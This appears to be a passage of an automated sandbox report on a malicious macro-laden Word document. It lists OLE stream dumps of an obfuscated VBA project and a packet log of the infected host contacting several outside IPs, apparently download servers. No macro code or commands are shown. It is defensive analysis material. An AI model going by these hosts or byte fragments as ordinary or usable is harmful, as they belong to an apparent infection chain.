                                                                    Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                                                    Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                                    Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 513
                                                                    Entropy:5.45796741226
                                                                    Base64 Encoded:True
                                                                    Data ASCII:I D = " { A E 2 F 0 F 9 F - 1 A 9 0 - 4 C B D - 9 8 9 D - 0 7 4 8 C 8 7 B D 5 4 3 } " . . D o c u m e n t = T v h 1 u 8 7 9 3 d l t n 9 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = T w h 1 g b 2 m p d 3 . . M o d u l e = X 1 b q z 0 q a e r 4 3 b 5 2 b f . . E x e N a m e 3 2 = " X o k y b e 1 s n 0 s g n " . . N a m e = " D D " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C 6 C 4 C A 4 9 F A 7 B 9 7 7 F 9 7 7 F 9 7 7 F 9 7 7 F " . . D P B
                                                                    Data Raw:49 44 3d 22 7b 41 45 32 46 30 46 39 46 2d 31 41 39 30 2d 34 43 42 44 2d 39 38 39 44 2d 30 37 34 38 43 38 37 42 44 35 34 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 76 68 31 75 38 37 39 33 64 6c 74 6e 39 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 54 77 68 31 67 62 32 6d 70 64 33 0d 0a 4d 6f 64 75 6c 65 3d 58 31 62 71 7a 30 71 61 65 72 34 33 62 35 32 62 66 0d 0a 45
                                                                    Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 137
                                                                    Entropy:3.83818292894
                                                                    Base64 Encoded:False
                                                                    Data ASCII:T v h 1 u 8 7 9 3 d l t n 9 . T . v . h . 1 . u . 8 . 7 . 9 . 3 . d . l . t . n . 9 . . . T w h 1 g b 2 m p d 3 . T . w . h . 1 . g . b . 2 . m . p . d . 3 . . . X 1 b q z 0 q a e r 4 3 b 5 2 b f . X . 1 . b . q . z . 0 . q . a . e . r . 4 . 3 . b . 5 . 2 . b . f . . . . .
                                                                    Data Raw:54 76 68 31 75 38 37 39 33 64 6c 74 6e 39 00 54 00 76 00 68 00 31 00 75 00 38 00 37 00 39 00 33 00 64 00 6c 00 74 00 6e 00 39 00 00 00 54 77 68 31 67 62 32 6d 70 64 33 00 54 00 77 00 68 00 31 00 67 00 62 00 32 00 6d 00 70 00 64 00 33 00 00 00 58 31 62 71 7a 30 71 61 65 72 34 33 62 35 32 62 66 00 58 00 31 00 62 00 71 00 7a 00 30 00 71 00 61 00 65 00 72 00 34 00 33 00 62 00 35 00 32
                                                                    Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5925
                                                                    Entropy:5.67391358744
                                                                    Base64 Encoded:False
                                                                    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                                                    Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                                                    Stream Path: Macros/VBA/dir, File Type: Tower32/600/400 68020 object not stripped - version 18435, Stream Size: 668
                                                                    Entropy:6.36196685937
                                                                    Base64 Encoded:True
                                                                    Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . D 2 . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . H . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . . . m . . . . ! O f f i c
                                                                    Data Raw:01 98 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 44 32 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 48 a0 fa 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                                                    Stream Path: WordDocument, File Type: data, Stream Size: 118910
                                                                    Entropy:7.18905041003
                                                                    Base64 Encoded:True
                                                                    Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . E r . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . ~ . . . b . . . b . . . E j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                    Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f0 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 45 72 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 7e d0 01 00 62 7f 00 00 62 7f 00 00 45 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
                                                                    Stream Path: word, File Type: data, Stream Size: 2685
                                                                    Entropy:7.92981016152
                                                                    Base64 Encoded:False
                                                                    Data ASCII:. . . & r . . } . ^ n . % . N = . n t . . . . . T . . K . - . . . . , g . . t v . . . . ' . . e B . ; E s . . . - } . i n . z . B . . ) . . L . . . . . . . . . . < . N . . X . V B : s . . . . m l . . . _ . Z h . K u . . . c . . . 1 . , . l I H . . . . > . . . P . / W . . . . . . . . m W . . . ! . D @ . - < I . . . . . \\ ~ . . X 3 I . . . . F . . e u f , . . . . . . . . . . . . . . V . . d . . . . . . W A ; . . K . . & . . . _ . ^ . . . 1 . ( 5 . . . . . . . . - 2 } . u . U . . . D . m . ) . . . . # M z r
                                                                    Data Raw:f5 d4 81 26 72 10 0b 7d cc 5e 6e 9d 25 f3 4e 3d cd 6e 74 8c a5 0b a7 04 54 09 a2 4b 02 2d 1b cc 8d fc 2c 67 f0 af 74 76 bc e8 0b dd 27 a2 89 65 42 b4 3b 45 73 c5 a6 ea 2d 7d d1 69 6e c0 7a 9f 42 a2 10 29 c6 e7 4c 1d f9 fe d0 bd ff c9 dc b2 7f 3c 09 4e f2 d6 58 c7 56 42 3a 73 de 0b 08 fb 6d 6c 9a 85 92 5f 9f 5a 68 1d 4b 75 f4 e8 ea 63 a0 1e e9 31 b7 2c ad 6c 49 48 d3 84 ad d9 3e ee

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                    01/24/21-18:04:47.949908 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | - | - | 69.38.130.14 | 192.168.2.22
                                                                    01/24/21-18:04:51.799916 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | - | - | 69.38.130.14 | 192.168.2.22

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                    Jan 24, 2021 18:03:27.558248043 CET | 49165 | 80 | 192.168.2.22 | 104.21.89.78
                                                                    Jan 24, 2021 18:03:27.573486090 CET | 80 | 49165 | 104.21.89.78 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:27.573607922 CET | 49165 | 80 | 192.168.2.22 | 104.21.89.78
                                                                    Jan 24, 2021 18:03:27.576509953 CET | 49165 | 80 | 192.168.2.22 | 104.21.89.78
                                                                    Jan 24, 2021 18:03:27.591650009 CET | 80 | 49165 | 104.21.89.78 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:27.612721920 CET | 80 | 49165 | 104.21.89.78 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:27.612776041 CET | 80 | 49165 | 104.21.89.78 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:27.612808943 CET | 80 | 49165 | 104.21.89.78 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:27.612844944 CET | 80 | 49165 | 104.21.89.78 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:27.612879992 CET | 80 | 49165 | 104.21.89.78 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:27.613009930 CET | 49165 | 80 | 192.168.2.22 | 104.21.89.78
                                                                    Jan 24, 2021 18:03:27.613063097 CET | 49165 | 80 | 192.168.2.22 | 104.21.89.78
                                                                    Jan 24, 2021 18:03:27.680191994 CET | 49166 | 80 | 192.168.2.22 | 166.62.10.32
                                                                    Jan 24, 2021 18:03:27.817333937 CET | 49165 | 80 | 192.168.2.22 | 104.21.89.78
                                                                    Jan 24, 2021 18:03:27.908014059 CET | 80 | 49166 | 166.62.10.32 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:27.908535957 CET | 49166 | 80 | 192.168.2.22 | 166.62.10.32
                                                                    Jan 24, 2021 18:03:27.908679008 CET | 49166 | 80 | 192.168.2.22 | 166.62.10.32
                                                                    Jan 24, 2021 18:03:28.132867098 CET | 80 | 49166 | 166.62.10.32 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:28.149194002 CET | 80 | 49166 | 166.62.10.32 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:28.341419935 CET | 49167 | 443 | 192.168.2.22 | 162.241.60.240
                                                                    Jan 24, 2021 18:03:28.363403082 CET | 49166 | 80 | 192.168.2.22 | 166.62.10.32
                                                                    Jan 24, 2021 18:03:28.474503040 CET | 443 | 49167 | 162.241.60.240 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:28.474772930 CET | 49167 | 443 | 192.168.2.22 | 162.241.60.240
                                                                    Jan 24, 2021 18:03:28.491565943 CET | 49167 | 443 | 192.168.2.22 | 162.241.60.240
                                                                    Jan 24, 2021 18:03:28.624684095 CET | 443 | 49167 | 162.241.60.240 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:28.625586033 CET | 443 | 49167 | 162.241.60.240 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:28.625660896 CET | 443 | 49167 | 162.241.60.240 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:28.625957012 CET | 49167 | 443 | 192.168.2.22 | 162.241.60.240
                                                                    Jan 24, 2021 18:03:28.637599945 CET | 49167 | 443 | 192.168.2.22 | 162.241.60.240
                                                                    Jan 24, 2021 18:03:28.638797998 CET | 49168 | 443 | 192.168.2.22 | 162.241.60.240
                                                                    Jan 24, 2021 18:03:28.770633936 CET | 443 | 49167 | 162.241.60.240 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:28.783262014 CET | 443 | 49168 | 162.241.60.240 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:28.783468008 CET | 49168 | 443 | 192.168.2.22 | 162.241.60.240
                                                                    Jan 24, 2021 18:03:28.784141064 CET | 49168 | 443 | 192.168.2.22 | 162.241.60.240
                                                                    Jan 24, 2021 18:03:28.928432941 CET | 443 | 49168 | 162.241.60.240 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:28.929406881 CET | 443 | 49168 | 162.241.60.240 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:28.929439068 CET | 443 | 49168 | 162.241.60.240 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:28.929625988 CET | 49168 | 443 | 192.168.2.22 | 162.241.60.240
                                                                    Jan 24, 2021 18:03:28.933468103 CET | 49168 | 443 | 192.168.2.22 | 162.241.60.240
                                                                    Jan 24, 2021 18:03:29.077756882 CET | 443 | 49168 | 162.241.60.240 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:29.247159004 CET | 49169 | 443 | 192.168.2.22 | 162.241.224.176
                                                                    Jan 24, 2021 18:03:29.391366959 CET | 443 | 49169 | 162.241.224.176 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:29.391542912 CET | 49169 | 443 | 192.168.2.22 | 162.241.224.176
                                                                    Jan 24, 2021 18:03:29.392230034 CET | 49169 | 443 | 192.168.2.22 | 162.241.224.176
                                                                    Jan 24, 2021 18:03:29.537026882 CET | 443 | 49169 | 162.241.224.176 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:29.537552118 CET | 443 | 49169 | 162.241.224.176 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:29.537595034 CET | 443 | 49169 | 162.241.224.176 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:29.537748098 CET | 49169 | 443 | 192.168.2.22 | 162.241.224.176
                                                                    Jan 24, 2021 18:03:29.541102886 CET | 49169 | 443 | 192.168.2.22 | 162.241.224.176
                                                                    Jan 24, 2021 18:03:29.542129040 CET | 49170 | 443 | 192.168.2.22 | 162.241.224.176
                                                                    Jan 24, 2021 18:03:29.675307989 CET | 443 | 49170 | 162.241.224.176 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:29.675443888 CET | 49170 | 443 | 192.168.2.22 | 162.241.224.176
                                                                    Jan 24, 2021 18:03:29.676029921 CET | 49170 | 443 | 192.168.2.22 | 162.241.224.176
                                                                    Jan 24, 2021 18:03:29.684993982 CET | 443 | 49169 | 162.241.224.176 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:29.815021038 CET | 443 | 49170 | 162.241.224.176 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:29.829583883 CET | 443 | 49170 | 162.241.224.176 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:29.829624891 CET | 443 | 49170 | 162.241.224.176 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:29.829824924 CET | 49170 | 443 | 192.168.2.22 | 162.241.224.176
                                                                    Jan 24, 2021 18:03:29.833112001 CET | 49170 | 443 | 192.168.2.22 | 162.241.224.176
                                                                    Jan 24, 2021 18:03:29.926774025 CET | 49171 | 80 | 192.168.2.22 | 45.143.97.183
                                                                    Jan 24, 2021 18:03:29.966149092 CET | 443 | 49170 | 162.241.224.176 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:29.975322962 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:29.975429058 CET | 49171 | 80 | 192.168.2.22 | 45.143.97.183
                                                                    Jan 24, 2021 18:03:29.975642920 CET | 49171 | 80 | 192.168.2.22 | 45.143.97.183
                                                                    Jan 24, 2021 18:03:30.023983955 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.521126032 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.521193027 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.521224022 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.521255970 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.521296978 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.521338940 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.521404982 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.521460056 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.521497965 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.521516085 CET | 49171 | 80 | 192.168.2.22 | 45.143.97.183
                                                                    Jan 24, 2021 18:03:30.521548986 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.521550894 CET | 49171 | 80 | 192.168.2.22 | 45.143.97.183
                                                                    Jan 24, 2021 18:03:30.521573067 CET | 49171 | 80 | 192.168.2.22 | 45.143.97.183
                                                                    Jan 24, 2021 18:03:30.570323944 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570390940 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570421934 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570461035 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570499897 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570538998 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570579052 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570619106 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570635080 CET | 49171 | 80 | 192.168.2.22 | 45.143.97.183
                                                                    Jan 24, 2021 18:03:30.570666075 CET | 49171 | 80 | 192.168.2.22 | 45.143.97.183
                                                                    Jan 24, 2021 18:03:30.570667982 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570672035 CET | 49171 | 80 | 192.168.2.22 | 45.143.97.183
                                                                    Jan 24, 2021 18:03:30.570713043 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570750952 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570779085 CET | 49171 | 80 | 192.168.2.22 | 45.143.97.183
                                                                    Jan 24, 2021 18:03:30.570790052 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570828915 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570852995 CET | 49171 | 80 | 192.168.2.22 | 45.143.97.183
                                                                    Jan 24, 2021 18:03:30.570871115 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570900917 CET | 49171 | 80 | 192.168.2.22 | 45.143.97.183
                                                                    Jan 24, 2021 18:03:30.570914030 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570952892 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.570972919 CET | 49171 | 80 | 192.168.2.22 | 45.143.97.183
                                                                    Jan 24, 2021 18:03:30.571000099 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.571043015 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.571059942 CET | 49171 | 80 | 192.168.2.22 | 45.143.97.183
                                                                    Jan 24, 2021 18:03:30.571120977 CET | 49171 | 80 | 192.168.2.22 | 45.143.97.183
                                                                    Jan 24, 2021 18:03:30.571181059 CET | 49171 | 80 | 192.168.2.22 | 45.143.97.183
                                                                    Jan 24, 2021 18:03:30.621032000 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.621093035 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.621130943 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.621166945 CET | 80 | 49171 | 45.143.97.183 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.621257067 CET | 49171 | 80 | 192.168.2.22 | 45.143.97.183
                                                                    Jan 24, 2021 18:03:30.621309042 CET | 49171 | 80 | 192.168.2.22 | 45.143.97.183
                                                                    Jan 24, 2021 18:03:30.811114073 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
                                                                    Jan 24, 2021 18:03:30.944581032 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:30.944771051 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
                                                                    Jan 24, 2021 18:03:30.944920063 CET | 49172 | 80 | 192.168.2.22 | 162.241.61.203
                                                                    Jan 24, 2021 18:03:31.078263998 CET | 80 | 49172 | 162.241.61.203 | 192.168.2.22
                                                                    Jan 24, 2021 18:03:31.210002899 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.210056067 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.210103035 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.210114002 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.210149050 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.210186958 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.210206985 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.210225105 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.210263968 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.210273027 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.210302114 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.210341930 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.210357904 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.210386038 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.210439920 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.343626976 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.343686104 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.343724966 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.343772888 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.343774080 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.343815088 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.343837023 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.343856096 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.343895912 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.343915939 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.343935013 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.343972921 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.344002962 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.344017982 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.344057083 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.344091892 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.344106913 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.344149113 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.344175100 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.344187021 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.344228029 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.344253063 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.344266891 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.344304085 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.344327927 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.344343901 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.344383955 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.344410896 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.344433069 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.344502926 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.344650984 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.345360041 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.477859974 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.477921009 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.477952957 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.477986097 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478027105 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478068113 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478107929 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478149891 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478188992 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478238106 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478264093 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.478281975 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478295088 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.478301048 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.478322029 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478353024 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.478377104 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478418112 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478442907 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.478456020 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478491068 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.478496075 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478545904 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478571892 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.478584051 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478624105 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478642941 CET4917280192.168.2.22162.241.61.203
                                                                    Jan 24, 2021 18:03:31.478663921 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478712082 CET8049172162.241.61.203192.168.2.22
                                                                    Jan 24, 2021 18:03:31.478728056 CET4917280192.168.2.22162.241.61.203
